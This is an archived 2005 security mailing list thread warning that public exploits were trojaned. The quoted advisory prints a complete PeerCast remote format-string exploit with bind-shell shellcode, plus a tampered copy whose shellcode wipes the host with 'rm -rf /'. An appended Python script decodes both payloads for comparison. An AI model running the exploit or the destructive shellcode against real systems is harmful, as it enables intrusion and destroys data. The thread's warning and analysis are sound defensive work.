Message-ID: <5598cfa1050726224930960f5a@mail.gmail.com>
Date: Wed Jul 27 06:50:06 2005
From: mark.sec at gmail.com (Mark Sec)
Subject: Beware trojaned exploits!

Yep, many exploits/shellcodes are "fake" in the wild, but does anyone have a tool to verify shellcodes ("public or 0days") online, or source codes? Something like "reverse shellcode": I believe I saw something online where you put in the shellcode and then you see the "action" that your shellcode has. Does anyone have something?

cheers :-)

/mark

On 27/07/05, securitymarket@...h.ai <securitymarket@...h.ai> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hackers may be at risk!
>
> It has come to our attention that a large amount of public
> security exploits/software have been modified and re-posted
> to legitimate trusted information sites for public downloads.
>
> We have recently come across 5 exploits that have had a shellcode
> modification after legit verification of trusted download sites.
>
> The following information security sites have listed a number of
> modified exploits:
>
> unl0ck security research
> g0tfault security
> m00 security
>
> Unl0ck was recently broken into by an anti-security/hacker organization
> named dikline (dikline.com ?) and ALL exploit sources were modified
> in different ways to infect the host attempting to exploit them.
>
> Numerous modified sources of "internal" / "0day" sources by a
> security group named "m00 security" have also been reported as
> modified by the dikline organization.
>
> We have audited numerous public exploit codes and have come up
> with some interesting results. The following is a clear example of
> modified shellcode:
>
> Original shellcode of the exploit "p33r-b33r.c" by unl0ck:
>
> /*
>  \ PeerCast <= 0.1211 remote format string exploit
>  / [<< Public Release >>]
>  \
>  / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
>  \
>  / uKt researcherz [ http://unl0ck.org ]
>  \
>  / greetz goes to: uKt researcherz.
>  \
>  /
>  \ - smallest code - better code!!!
>  /
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <stdarg.h>
> #include <string.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <netdb.h>
>
> //*******************************************
> #define doit( b0, b1, b2, b3, addr ) { \
>     b0 = (addr >> 24) & 0xff; \
>     b1 = (addr >> 16) & 0xff; \
>     b2 = (addr >> 8) & 0xff; \
>     b3 = (addr ) & 0xff; \
> }
> //*******************************************
>
> //****************************************************************
> char shellcode[] = // binds 4444 port
> "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
> "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
> "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
> "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
> "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
> "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
> "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
> //****************************************************************
>
> //****************************
> #define HOST "127.0.0.1"
> #define PORT 7144
> #define GOTADDR 0x0809da9c
> #define SHELLADDR 0x49adb23c
> //****************************
>
> //***********************************************************************
> char *
> evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
> {
>     char * buf;
>     unsigned char b0, b1, b2, b3;
>     int start = 256;
>
>     doit( b0, b1, b2, b3, retaddr );
>     buf = (char *)malloc(999);
>     memset( buf, 0, 999 );
>
>     b3 -= figure;
>     b2 -= figure;
>     b1 -= figure;
>     b0 -= figure;
>
>     snprintf( buf, 999,
>         "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
>         b3 - 16 + start - base, offset,
>         b2 - b3 + start, offset + 1,
>         b1 - b2 + start, offset + 2,
>         b0 - b1 + start, offset + 3 );
>
>     return buf;
> }
> //*************************************************************************
>
> //*************************************************************************
> int
> main( int argc, char * argv[] )
> {
>     struct sockaddr_in addr;
>     int sock;
>     char * fmt;
>     char endian[31337], da_shell[31337];
>     unsigned long locaddr, retaddr;
>     unsigned int offset, base;
>     unsigned char b0, b1, b2, b3;
>
>     system("clear");
>     printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
>     printf("*^*^*^ by Darkeagle ^*^*^*\n");
>     printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");
>
>     memset( endian, 0x00, 31337 );
>     memset( da_shell, 0x00, 31337 );
>
>     addr.sin_family = AF_INET;
>     addr.sin_port = htons(PORT);
>     addr.sin_addr.s_addr = inet_addr(HOST);
>
>     sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
>
>     locaddr = GOTADDR;
>     retaddr = SHELLADDR;
>     offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141
>
>     doit( b0, b1, b2, b3, locaddr );
>
>     base = 4;
>     printf("[*] Buildin' evil code\n");
>     strcat(endian, "GET /html/en/index.html");
>     snprintf( endian+strlen(endian), sizeof(endian),
>         "%c%c%c%c"
>         "%c%c%c%c"
>         "%c%c%c%c"
>         "%c%c%c%c",
>         b3, b2, b1, b0,
>         b3 + 1, b2, b1, b0,
>         b3 + 2, b2, b1, b0,
>         b3 + 3, b2, b1, b0 );
>
>     fmt = evil_builder( retaddr, offset, base, 0x10 );
>
>     memset(fmt+strlen(fmt), 0x55, 32);
>     strcat(fmt, shellcode);
>     strcat(endian, fmt);
>     strcat(endian, "\r\n\r\n\r\n");
>     printf("[+] Buildin' complete!\n");
>     sprintf(da_shell, "telnet %s 4444", HOST);
>
>     // just go, y0!
>     printf("[*] Connectin'\n");
>     if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) {
>         printf("[-] Connection failed!\n\n");
>         exit(0); }
>
>     printf("[+] Connected!\n");
>     printf("[*] Sleepin'\n");
>     sleep(1);
>
>     printf("[*] Sendin'\n");
>     send(sock, endian, strlen(endian), 0);
>
>     printf("[*] Sleepin'\n");
>     sleep(1);
>
>     printf("[*] Connectin' in da shell\n\n");
>     sleep(1);
>     system(da_shell);
>     return 0;
> }
>
>
> - ----------- Replaced modified shellcode to rm-rf remote host:
>
> /*
>  \ PeerCast <= 0.1211 remote format string exploit
>  / [<< Public Release >>]
>  \
>  / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
>  \
>  / uKt researcherz [ http://unl0ck.org ]
>  \
>  / greetz goes to: uKt researcherz.
>  \
>  /
>  \ - smallest code - better code!!!
>  /
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <stdarg.h>
> #include <string.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <netdb.h>
>
> //*******************************************
> #define doit( b0, b1, b2, b3, addr ) { \
>     b0 = (addr >> 24) & 0xff; \
>     b1 = (addr >> 16) & 0xff; \
>     b2 = (addr >> 8) & 0xff; \
>     b3 = (addr ) & 0xff; \
> }
> //*******************************************
>
> //****************************************************************
> char shellcode[] = // binds 4444 port
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
> //****************************************************************
>
>
> The above shellcode is a modified version that was found listed
> on the unl0ck security website under downloads days before the
> site went down.
>
> We have audited and found differences in shellcode on the following
> code:
>
> (POSSIBLY MANY MORE)
>
> unrealmagic.c - shellcode modified to rm -rf /* host
> p33r-b33r.c - shellcode modified to rm -rf /* host
> 0x666-ftpd.c - shellcode modified to rm -rf /* host
> gotfault-htdead.c - shellcode modified to rm -rf /* host
> gotfault-lcdproc.c - shellcode modified to install LKM
> gotfault-newspost.c - shellcode modified to rm -rf /* host
> gotfault-ngircd.c - shellcode modified to rm -rf /* host
> gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
> gotfault-openftpd-msg.c - shellcode modified to install LKM
> gotfault-pbs4q.c - shellcode modified to add password to mail users
> gotfault-putty.c - shellcode modified to install LKM
> gotfault-realmagicV2.c - shellcode modified to install LKM
> gotfault-sing.sh - shellcode modified to install unknown backdoor.
> gotfault-vmpsd.c - shellcode modified to rm -rf /* host
> gotfault-zebedee.c - shellcode modified to rm -rf /* host
> gotfault-zebedee-win32.zip - unknown
> gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
> gotfault-3cdsmash.c - shellcode modified to install NEW LKM
> gotfault-psoproxy.c - shellcode modified to install LKM
> gotfault-pcwsd.c - shellcode modified to install LKM
>
>
> This is an urgent notice to all of the security individuals who
> have downloaded any of the above (and more) exploits. Please take
> note to your collections; we must find out what this dikline
> organization has backdoor'd and fix it!
>
> *** MAKE SURE to check your shellcode whenever possible.
>
> -----BEGIN PGP SIGNATURE-----
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 2.4
>
> wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA
> njACLQnU0QQDfXtKglEjX7ko5TdA
> =nU9l
> -----END PGP SIGNATURE-----
>
>
> Concerned about your privacy? Follow this link to get
> secure FREE email: http://www.hushmail.com/?l=2
>
> Free, ultra-private instant messaging with Hush Messenger
> http://www.hushmail.com/services-messenger?l=434
>
> Promote security and make money with the Hushmail Affiliate Program:
> http://www.hushmail.com/about-affiliate?l=427
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
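The quoted post asks readers to "check your shellcode", and Mark asks for a tool that shows what a payload actually does. A reviewer can get most of the way with static checks alone. The script below is an added example, not code from either poster: it parses the two `char shellcode[]` literals exactly as they appear in the quoted post, unpacks the fnstenv/XOR decoder stub that the original "binds 4444 port" payload starts with (the 24-byte stub layout is assumed from the bytes on the page; any other encoder is left alone), recovers strings that the code builds on the stack with `push imm32`/`push imm16` instructions, and reports the `push word` port in front of a typical bind(). On the original payload it finds the port 4444 and `/bin//sh`; on the replacement it finds no port and the stack string `... -c ... rm -rf / ...`, which is exactly the discrepancy the post is warning about. The push scan is a heuristic linear sweep, not a disassembler, so treat its output as a prompt for a closer look rather than proof.

```python
import re
import struct

# Both literals are copied verbatim from the quoted post: the payload that
# p33r-b33r.c comments as "binds 4444 port", and the replacement the post says
# was swapped in on the download site.
ORIGINAL_SHELLCODE_C = r'''
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"
'''
MODIFIED_SHELLCODE_C = r'''
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"
'''


def c_hex_literal_to_bytes(text):
    """Turn a C string literal made only of \\xHH escapes into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


ORIGINAL = c_hex_literal_to_bytes(ORIGINAL_SHELLCODE_C)
MODIFIED = c_hex_literal_to_bytes(MODIFIED_SHELLCODE_C)

# Assumed layout of the decoder stub the original payload starts with:
#   xor ecx,ecx; sub ecx,-N; fldz; fnstenv [esp-0xc]; pop ebx;
#   xor dword [ebx+0x13],KEY; sub ebx,-4; loop
# ebx+0x13 is offset 24, so the XOR-encoded body starts there.
STUB_A = b"\x31\xc9\x83\xe9"
STUB_B = b"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
STUB_C = b"\x83\xeb\xfc\xe2\xf4"


def decode_fnstenv_xor(sc):
    """Return the decoded body if `sc` begins with the stub above, else None."""
    if sc[:4] != STUB_A or sc[5:15] != STUB_B or sc[19:24] != STUB_C:
        return None
    ndwords = (-sc[4]) & 0xFF            # sub ecx, -N leaves ecx == N
    key = sc[15:19]                      # 4-byte XOR key embedded in the stub
    body = sc[24:24 + 4 * ndwords]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))


def stack_images(code):
    """Heuristic sweep for x86 `push imm32` (68) and `push imm16` (66 68).
    Back-to-back pushes are joined in reverse order, which is the order the
    bytes end up in memory because the stack grows downwards."""
    images, run, i = [], [], 0
    while i < len(code):
        if code[i:i + 2] == b"\x66\x68" and i + 4 <= len(code):
            run.append(code[i + 2:i + 4]); i += 4
        elif code[i] == 0x68 and i + 5 <= len(code):
            run.append(code[i + 1:i + 5]); i += 5
        else:
            if run:
                images.append(b"".join(reversed(run))); run = []
            i += 1
    if run:
        images.append(b"".join(reversed(run)))
    return images


def printable_fragments(blob, min_len=3):
    """Printable ASCII runs of at least `min_len` bytes, as str."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def bind_port(code):
    """`push word PORT` (66 68 hi lo) sits in front of bind() in the usual x86
    bind shells; return the first one in network byte order, or None."""
    m = re.search(rb"\x66\x68(..)", code, re.DOTALL)
    return struct.unpack(">H", m.group(1))[0] if m else None


def triage(sc):
    """Static facts a reviewer can compare against the payload's own comment."""
    decoded = decode_fnstenv_xor(sc)
    body = decoded if decoded is not None else sc
    frags = [f for img in stack_images(body) for f in printable_fragments(img)]
    return {"length": len(sc), "xor_decoded": decoded is not None,
            "bind_port": bind_port(body), "stack_fragments": frags}


if __name__ == "__main__":
    for name, sc in (("original", ORIGINAL), ("modified", MODIFIED)):
        print(name, triage(sc))
```

The point of the comparison is not the port by itself but the mismatch: a payload whose comment says "binds 4444 port" should expose a `push word 4444` and `/bin//sh` after decoding, and should not contain a shell command line. Any payload that fails that sanity check belongs in a disassembler or an emulator, run on an isolated machine, before it is trusted.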